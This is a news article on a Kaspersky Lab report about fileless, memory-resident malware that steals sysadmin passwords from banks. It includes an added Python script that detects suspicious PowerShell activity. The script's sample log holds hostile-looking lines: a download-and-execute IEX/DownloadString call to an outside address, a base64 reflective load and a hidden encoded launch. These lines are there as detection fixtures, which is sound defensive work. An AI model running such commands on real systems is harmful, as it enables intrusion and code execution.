Revealed: Malware that skulks in memory, invisibly collecting sysadmins' passwords

APT tactics deployed by mystery cybercrooks unveiled

Cybercriminals have hit scores of enterprises in 40 countries using hidden malware.

Banks, telecommunication companies and government organisations in the US, South America, Europe and Africa have already been hit by the ongoing (and stealthy) attacks.

Kaspersky Lab experts report that the attacks harness widely available penetration-testing and administration tools as well as the PowerShell framework for task automation in Windows. Malicious code resides only in memory, they say.

Hackers behind the attack have apparently taken pains to avoid writing files onto the hard drive of compromised PCs, a tactic designed to foil both whitelisting technologies and post-breach forensic analysis. The crooks are using anti-forensic techniques uncommon in everyday assaults.

"The attackers stay around just long enough to gather information before their traces are wiped from the system on the first reboot," according to Kaspersky Lab boffins.

Kaspersky Lab experts were set on the trail of the malware campaign by "banks in CIS which had found the penetration-testing software, Meterpreter, now often used for malicious purposes, in the memory of their servers when it was not supposed to be there". The Meterpreter code was combined with a number of legitimate PowerShell scripts and other utilities. The combined tools had been adapted into malicious code that could hide in memory, invisibly collecting the passwords of system administrators.
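Because the tooling described above (Meterpreter staged through PowerShell) writes nothing to disk and is gone after a reboot, PowerShell script block logging is one of the few durable records a defender keeps. The triage script below is an added example by this editor, not code from the article or from Kaspersky Lab: it scans a constructed log export for script-block events (Windows Event ID 4104) that combine two or more in-memory-execution heuristics; the line format, the heuristic patterns and the sample lines are all assumptions made for illustration.

```python
import re
from dataclasses import dataclass
from typing import List

# Heuristics for PowerShell that stages code in memory rather than on disk.
# These are the editor's own illustrative choices, not indicators from the article.
IN_MEMORY_PATTERNS = {
    "encoded_command":   re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}", re.I),
    "base64_decode":     re.compile(r"FromBase64String", re.I),
    "invoke_expression": re.compile(r"\b(IEX|Invoke-Expression)\b", re.I),
    "reflective_load":   re.compile(r"Reflection\.Assembly\]::Load", re.I),
    "web_download":      re.compile(r"\.(DownloadString|DownloadData)\(", re.I),
    "memory_alloc":      re.compile(r"\b(VirtualAlloc|WriteProcessMemory|CreateThread)\b", re.I),
}

@dataclass
class Finding:
    line_no: int
    event_id: str
    matched: List[str]

def score_script_block(text: str) -> List[str]:
    """Names of every in-memory-execution heuristic matched by one script block."""
    return [name for name, rx in IN_MEMORY_PATTERNS.items() if rx.search(text)]

def triage_log(lines, min_hits=2):
    """Flag 4104 (script block) events matching at least min_hits heuristics.
    Requiring two independent indicators keeps a lone IEX in an admin script out of the queue."""
    findings = []
    for n, line in enumerate(lines, 1):
        # Assumed export format: "<timestamp> <event id> <script block text>"
        m = re.match(r"^(?P<ts>\S+)\s+(?P<eid>\d{4})\s+(?P<text>.*)$", line)
        if not m or m.group("eid") != "4104":
            continue  # other event IDs are not script blocks; skip them here
        hits = score_script_block(m.group("text"))
        if len(hits) >= min_hits:
            findings.append(Finding(n, m.group("eid"), hits))
    return findings

# Constructed sample export; not real telemetry.
SAMPLE_LOG = [
    "2017-02-08T03:12:44Z 4104 Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB",
    "2017-02-08T03:13:01Z 4104 IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')",
    "2017-02-08T03:13:05Z 4104 $b=[Convert]::FromBase64String($s);[Reflection.Assembly]::Load($b)",
    "2017-02-08T03:14:10Z 4688 A new process has been created: powershell.exe -nop -w hidden -enc SQBFAFgA...",
    "2017-02-08T03:15:00Z 4104 Invoke-Expression (Get-Content .\\deploy.ps1 -Raw)",
]

if __name__ == "__main__":
    for f in triage_log(SAMPLE_LOG):
        print(f"line {f.line_no}: event {f.event_id} matched {', '.join(f.matched)}")
```

Lowering `min_hits` to 1 trades precision for recall; tune it against your own baseline of legitimate administrative scripts before alerting on it.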

The ultimate goal of the attack appears to be access to financial processes. Kaspersky Lab subsequently discovered that the same types of attack were occurring on an industrial scale worldwide, hitting more than 140 enterprise networks in a range of business sectors, with most victims located in the US, France, Ecuador, Kenya, the UK and Russia.

It's unclear who is behind the attacks. "The use of open source exploit code, common Windows utilities and unknown domains makes it almost impossible to determine the group responsible – or even whether it is a single group or several groups sharing the same tools," according to Kaspersky Lab.

Known groups that have the most similar approaches are GCMAN and Carbanak, who therefore both count as suspects.

Details of the second part of the operation, showing how the attackers implemented unique tactics to withdraw money through ATMs, are due to be presented at Kaspersky Lab's Security Analyst Summit in April. ®

Biting the hand that feeds IT © 1998–2021